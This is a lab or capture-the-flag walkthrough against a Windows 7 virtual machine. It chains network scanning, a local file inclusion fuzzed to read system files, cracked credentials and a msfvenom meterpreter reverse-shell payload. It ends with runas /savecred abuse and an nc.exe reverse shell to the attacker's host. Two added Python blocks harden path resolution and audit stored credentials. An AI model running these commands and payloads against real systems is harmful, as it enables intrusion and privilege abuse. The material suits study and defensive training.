image-20250721112052579

┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# arp-scan -I eth1 192.168.56.0/24
Interface: eth1, type: EN10MB, MAC: 00:0c:29:96:80:36, IPv4: 192.168.56.103
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:81:30:5f PCS Systemtechnik GmbH
192.168.56.109 08:00:27:56:13:ce PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.237 seconds (114.44 hosts/sec). 3 responded

┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# nmap -sV -sC 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-20 23:22 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 32.25% done; ETC: 23:22 (0:00:02 remaining)
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 8.33% done; ETC: 23:23 (0:01:06 remaining)
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 41.67% done; ETC: 23:22 (0:00:15 remaining)
Nmap scan report for 192.168.56.109
Host is up (0.00022s latency).
Not shown: 988 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64) PHP/7.2.0)
|_http-server-header: Apache/2.4.57 (Win64) PHP/7.2.0
|_http-title: Index of /
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
| rdp-ntlm-info:
| Target_Name: RUNAS-PC
| NetBIOS_Domain_Name: RUNAS-PC
| NetBIOS_Computer_Name: RUNAS-PC
| DNS_Domain_Name: runas-PC
| DNS_Computer_Name: runas-PC
| Product_Version: 6.1.7601
|_ System_Time: 2025-07-21T03:23:03+00:00
|_ssl-date: 2025-07-21T03:23:21+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=runas-PC
| Not valid before: 2025-07-20T03:15:10
|_Not valid after: 2026-01-19T03:15:10
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:56:13:CE (Oracle VirtualBox virtual NIC)
Service Info: Host: RUNAS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -36m01s, deviation: 1h20m30s, median: -2s
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: runas-PC
| NetBIOS computer name: RUNAS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-07-21T06:23:02+03:00
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: RUNAS-PC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:56:13:ce (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2025-07-21T03:23:02
|_ start_date: 2025-07-21T03:15:10

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.27 seconds

Let's take a look at the web service.

image-20250721112714280

image-20250721113904907

There is an arbitrary file read.

image-20250721114038793

image-20250721114002480

This part is also quite unrealistic.

Both flags can simply be read out directly, and that's it.

image-20250721114131649

Let's pretend we don't know where the flags are and do some fuzzing first to see what is there.

┌──(root㉿kali)-[/usr/share/seclists/Fuzzing/LFI]
└─# curl -s -w "%{size_download}\n" "http://192.168.56.109/index.php?file=566" -o /dev/null
429

┌──(root㉿kali)-[/usr/share/seclists/Fuzzing/LFI]
└─# ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u "http://192.168.56.109/index.php?file=FUZZ" -fs 429


v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://192.168.56.109/index.php?file=FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 429
________________________________________________

C:/WINDOWS/Repair/SAM [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 11ms]
C:/WINDOWS/System32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 3ms]
C:/Windows/system32/config/regback/sam [Status: 200, Size: 627, Words: 84, Lines: 20, Duration: 3ms]
C:/Windows/system32/config/regback/security [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 2ms]
C:/Windows/system32/config/regback/default [Status: 200, Size: 631, Words: 84, Lines: 20, Duration: 4ms]
C:/Windows/System32/inetsrv/config/applicationHost.config [Status: 200, Size: 79253, Words: 12108, Lines: 821, Duration: 1ms]
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml [Status: 200, Size: 58608, Words: 8247, Lines: 599, Duration: 4ms]
C:/php/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 39ms]
C:/Users/Administrator/NTUser.dat [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 50ms]
C:/Windows/win.ini [Status: 200, Size: 1042, Words: 103, Lines: 46, Duration: 63ms]
C:/Windows/system32/config/regback/system [Status: 200, Size: 630, Words: 84, Lines: 20, Duration: 115ms]
C:/Windows/system32/config/regback/software [Status: 200, Size: 632, Words: 84, Lines: 20, Duration: 119ms]
c:/WINDOWS/system32/drivers/etc/hosts [Status: 200, Size: 1375, Words: 260, Lines: 39, Duration: 1ms]
c:/WINDOWS/system32/drivers/etc/networks [Status: 200, Size: 946, Words: 171, Lines: 34, Duration: 2ms]
c:/WINDOWS/system32/drivers/etc/services [Status: 200, Size: 19622, Words: 8783, Lines: 303, Duration: 4ms]
c:/php/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 129ms]
c:/WINDOWS/setupact.log [Status: 200, Size: 25774, Words: 2482, Lines: 315, Duration: 4ms]
c:/PHP/php.ini [Status: 200, Size: 85387, Words: 11106, Lines: 1929, Duration: 137ms]
c:/WINDOWS/setuperr.log [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 6ms]
c:/WINDOWS/WindowsUpdate.log [Status: 200, Size: 111314, Words: 9007, Lines: 1208, Duration: 4ms]
C:/Windows/repair/system [Status: 200, Size: 425, Words: 68, Lines: 18, Duration: 183ms]
c:/WINDOWS/system32/drivers/etc/protocol [Status: 200, Size: 1973, Words: 539, Lines: 45, Duration: 51ms]
c:/WINDOWS/system32/drivers/etc/lmhosts.sam [Status: 200, Size: 4760, Words: 774, Lines: 97, Duration: 54ms]
:: Progress: [236/236] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
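The file parameter accepts any Windows path, which is why the ffuf run above returns system files straight from the web server. As an added example that is not part of the original writeup, the following Python models the two resolvers side by side: the vulnerable pattern that joins the client-supplied value onto the web root, and a hardened one that only accepts a single allowlisted filename. The web root C:\Apache24\htdocs is an assumed value (the writeup does not reveal the real one); PureWindowsPath reproduces Windows path semantics so the code runs on any host.

```python
import re
from pathlib import PureWindowsPath
from typing import Dict, Iterable, Optional, Tuple

# Assumed web root for this example; the writeup does not reveal the real one.
WEB_ROOT = r"C:\Apache24\htdocs"

# One path component: letters, digits, '_' or '-', with an optional short extension.
# No separators, no ':' (blocks drive letters and NTFS alternate data streams),
# no trailing dot or space (Windows strips those silently).
ALLOWED_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}(\.[A-Za-z0-9]{1,8})?$")

# Reserved device names resolve to devices regardless of directory or extension.
RESERVED = ({"CON", "PRN", "AUX", "NUL"}
            | {f"COM{i}" for i in range(1, 10)}
            | {f"LPT{i}" for i in range(1, 10)})


def vulnerable_resolve(base_dir: str, user_path: str) -> str:
    """The pattern behind index.php?file=...: the client value is joined straight
    onto the web root. On Windows, joining an absolute path such as C:/Windows/win.ini
    discards the base entirely, and '..' segments are never normalised away here."""
    return str(PureWindowsPath(base_dir) / user_path)


def hardened_resolve(base_dir: str, user_path: str) -> Optional[str]:
    """Return the file to serve, or None when the request must be refused.
    Strategy: allowlist a single bare filename instead of blocklisting traversal."""
    if "\x00" in user_path:                 # NUL truncation tricks in older PHP
        return None
    parts = PureWindowsPath(user_path).parts
    if len(parts) != 1:                     # absolute path, UNC path, wrapper, or any separator
        return None
    name = parts[0]
    if not ALLOWED_NAME.match(name):
        return None
    if name.split(".")[0].upper() in RESERVED:
        return None
    return str(PureWindowsPath(base_dir) / name)


def triage(requests: Iterable[str]) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map each requested value to (vulnerable result, hardened result) for comparison."""
    return {r: (vulnerable_resolve(WEB_ROOT, r), hardened_resolve(WEB_ROOT, r)) for r in requests}


if __name__ == "__main__":
    # Constructed sample requests: the benign one and values of the kind the ffuf run used.
    samples = ["566", "C:/Windows/win.ini", r"..\..\Windows\win.ini",
               "c:/WINDOWS/setuperr.log", r"\\attacker\share\x", "NUL.txt"]
    for req, (vuln, safe) in triage(samples).items():
        print(f"{req!r:32} vulnerable -> {vuln:45} hardened -> {safe}")
```

The hardened resolver deliberately does not try to strip `..` or reject drive letters one by one; a one-component allowlist makes every accepted value land inside the web root by construction, which is the check a reviewer should look for in any `include`-by-parameter code.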

image-20250721160951083

Found a set of MD5 hashes.

image-20250721161650502

Obtained the username and password:

runas/yakuzza

image-20250721162625035

Next comes privilege escalation. First, get a meterpreter shell:

┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
┌──(root㉿kali)-[/myift/bachang/win/runas]
└─# python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
192.168.56.109 - - [21/Jul/2025 04:58:34] "GET /shell.exe HTTP/1.1" 200 -
192.168.56.109 - - [21/Jul/2025 04:58:34] "GET /shell.exe HTTP/1.1" 200 -
192.168.56.109 - - [21/Jul/2025 04:59:28] "GET /shell.exe HTTP/1.1" 200 -
192.168.56.109 - - [21/Jul/2025 04:59:28] "GET /shell.exe HTTP/1.1" 200 -


msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.56.103
LHOST => 192.168.56.103
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.103:4444
[*] Sending stage (177734 bytes) to 192.168.56.109
[*] Meterpreter session 26 opened (192.168.56.103:4444 -> 192.168.56.109:49215) at 2025-07-21 05:11:31 -0400

meterpreter >

meterpreter > background
[*] Backgrounding session 26...
msf6 exploit(multi/handler) >
msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > sessions -l

Active sessions
===============

Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 shell 192.168.56.103:4444 -> 192.168.56.109:49193 (192.168.56.109)
3 shell 192.168.56.103:4444 -> 192.168.56.109:49194 (192.168.56.109)
5 shell 192.168.56.103:4444 -> 192.168.56.109:49196 (192.168.56.109)
6 shell 192.168.56.103:4444 -> 192.168.56.109:49197 (192.168.56.109)
9 shell 192.168.56.103:4444 -> 192.168.56.109:49199 (192.168.56.109)
10 shell 192.168.56.103:4444 -> 192.168.56.109:49200 (192.168.56.109)
11 shell 192.168.56.103:4444 -> 192.168.56.109:49201 (192.168.56.109)
13 shell 192.168.56.103:4444 -> 192.168.56.109:49202 (192.168.56.109)
14 shell 192.168.56.103:4444 -> 192.168.56.109:49203 (192.168.56.109)
15 shell 192.168.56.103:4444 -> 192.168.56.109:49204 (192.168.56.109)
16 shell 192.168.56.103:4444 -> 192.168.56.109:49205 (192.168.56.109)
17 shell 192.168.56.103:4444 -> 192.168.56.109:49206 (192.168.56.109)
18 shell 192.168.56.103:4444 -> 192.168.56.109:49207 (192.168.56.109)
19 shell 192.168.56.103:4444 -> 192.168.56.109:49208 (192.168.56.109)
20 shell 192.168.56.103:4444 -> 192.168.56.109:49209 (192.168.56.109)
21 shell 192.168.56.103:4444 -> 192.168.56.109:49210 (192.168.56.109)
22 shell 192.168.56.103:4444 -> 192.168.56.109:49211 (192.168.56.109)
23 shell 192.168.56.103:4444 -> 192.168.56.109:49212 (192.168.56.109)
24 shell 192.168.56.103:4444 -> 192.168.56.109:49213 (192.168.56.109)
25 shell 192.168.56.103:4444 -> 192.168.56.109:49214 (192.168.56.109)
26 meterpreter x86/windows runas-PC\runas @ RUNAS-PC 192.168.56.103:4444 -> 192.168.56.109:49215 (192.168.56.109)

msf6 post(multi/recon/local_exploit_suggester) > set session 26
session => 26
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.56.109 - Collecting local exploits for x86/windows...
/usr/share/metasploit-framework/vendor/bundle/ruby/3.3.0/gems/logging-2.4.0/lib/logging.rb:10: warning: /usr/lib/x86_64-linux-gnu/ruby/3.3.0/syslog.so was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 3.4.0.
You can add syslog to your Gemfile or gemspec to silence this warning.
Also please contact the author of logging-2.4.0 to request adding syslog into its gemspec.
[*] 192.168.56.109 - 203 exploit checks are being tried...
[+] 192.168.56.109 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 192.168.56.109 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 192.168.56.109 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 192.168.56.109 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 192.168.56.109 - Valid modules for session 26:
=============================

# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_comhijack Yes The target appears to be vulnerable.
2 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
3 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
4 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
5 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
7 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
8 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
9 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
10 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
11 exploit/windows/local/always_install_elevated No The target is not exploitable.
12 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
13 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
14 exploit/windows/local/bthpan No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
19 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
20 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
21 exploit/windows/local/ikeext_service No The check raised an exception.
22 exploit/windows/local/ipass_launch_app No The check raised an exception.
23 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
24 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
25 exploit/windows/local/mqac_write No The target is not exploitable.
26 exploit/windows/local/ms10_015_kitrap0d No The target is not exploitable.
27 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
28 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
29 exploit/windows/local/ms14_070_tcpip_ioctl No The target is not exploitable.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_016_webdav No The target is not exploitable.
32 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
33 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
34 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
35 exploit/windows/local/ms_ndproxy No The target is not exploitable.
36 exploit/windows/local/novell_client_nicm No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/panda_psevents No The target is not exploitable.
39 exploit/windows/local/ppr_flatten_rec No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
42 exploit/windows/local/webexec No The check raised an exception.

[*] Post module execution completed

Start trying the exploits marked as usable.

Tried all of them; not a single one worked.

Fall back to information gathering.

C:\Users\runas>whoami /priv
whoami /priv

AYRICALIK BİLGİLERİ
----------------------

Ayrıcalık Adı Açıklama Durum
============================= ================================== ==========
SeShutdownPrivilege Sistemi kapat Devre Dışı
SeChangeNotifyPrivilege Çapraz geçiş denetimini atla Etkin
SeUndockPrivilege Bilgisayarı takma biriminden çıkar Devre Dışı
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır Devre Dışı
SeTimeZonePrivilege Saat dilimini değiştir Devre Dışı

C:\Users\runas>cmdkey /list
cmdkey /list

Depolanan geçerli kimlik bilgileri:

Hedef: Domain:interactive=RUNAS-PC\Administrator
Tür: Etki Alanı Parolası
Kullanıcı: RUNAS-PC\Administrator



cmdkey /list lists the credentials stored for the current user (such as usernames and passwords). These credentials are typically used for automatic logon to remote computers, network shares, or other resources protected by authentication.

If any credentials worth trying are found, they can be used with the runas command and the /savecred option, as shown below.

runas /savecred /user:Administrator cmd.exe

This command runs cmd.exe (the command prompt) as the Administrator user and uses the savecred option to store the password, so that the same command can be run later without entering the password again.
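The writeup finds a Domain:interactive credential for the local Administrator cached in Credential Manager, which is exactly what lets the runas /savecred step succeed without a password prompt. As an added example that is not part of the original writeup, this Python parses cmdkey /list output and rates each stored credential from an audit perspective. The sample output is constructed (English locale; the writeup's host printed the same structure with Turkish labels), and the parser relies only on the fixed Target / Type / User ordering of each entry, so it works regardless of display language.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# Constructed sample of `cmdkey /list` output in the English locale. Entries are
# separated by blank lines and always appear in the order Target / Type / User,
# whatever the display language; the labels themselves are localised.
SAMPLE_CMDKEY_OUTPUT = """\
Currently stored credentials:

    Target: Domain:interactive=RUNAS-PC\\Administrator
    Type: Domain Password
    User: RUNAS-PC\\Administrator

    Target: Domain:interactive=EXAMPLE\\jdoe
    Type: Domain Password
    User: jdoe@example.test

    Target: Domain:target=fileserver.example.test
    Type: Domain Password
    User: EXAMPLE\\svc_backup

    Target: LegacyGeneric:target=git:https://github.com
    Type: Generic
    User: someuser
"""

# Account names that should never be cached for interactive use on a workstation.
PRIVILEGED_ACCOUNTS = {"administrator", "admin"}


@dataclass
class StoredCredential:
    target: str
    cred_type: str
    user: str

    @property
    def interactive(self) -> bool:
        # Domain:interactive=... entries are the ones `runas /savecred` consumes.
        return self.target.lower().startswith("domain:interactive=")

    @property
    def account(self) -> str:
        # DOMAIN\user -> user ; user@domain -> user
        return self.user.rsplit("\\", 1)[-1].split("@", 1)[0]


def parse_cmdkey(output: str) -> List[StoredCredential]:
    """Split the output into blank-line-separated entries and read the value after
    the first ':' on each line; the header block has no such values and is skipped."""
    creds = []
    for block in re.split(r"\n\s*\n", output.strip()):
        values = []
        for line in block.splitlines():
            _label, sep, value = line.partition(":")
            if sep and value.strip():
                values.append(value.strip())
        if len(values) >= 3:
            creds.append(StoredCredential(values[0], values[1], values[2]))
    return creds


def severity(cred: StoredCredential) -> str:
    privileged = cred.account.lower() in PRIVILEGED_ACCOUNTS
    if cred.interactive and privileged:
        return "HIGH"      # any process in this session can run as the privileged account
    if cred.interactive or privileged:
        return "MEDIUM"
    return "INFO"


def audit_cmdkey(output: str) -> Dict[str, str]:
    """Map each stored-credential target to a severity rating."""
    return {c.target: severity(c) for c in parse_cmdkey(output)}


if __name__ == "__main__":
    for target, sev in audit_cmdkey(SAMPLE_CMDKEY_OUTPUT).items():
        print(f"[{sev:6}] {target}")
```

A HIGH finding is remediated on the host with cmdkey /delete:Domain:interactive=RUNAS-PC\Administrator, and prevented by not saving privileged-account credentials interactively (runas /savecred on a workstation) in the first place.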

image-20250721182348085

If remote desktop is not available, upload an nc.exe and pop a new shell back instead:

runas /env /noprofile /savecred /user:Administrator "C:\Users\runas\nc.exe 192.168.10.103 1234 -e cmd.exe"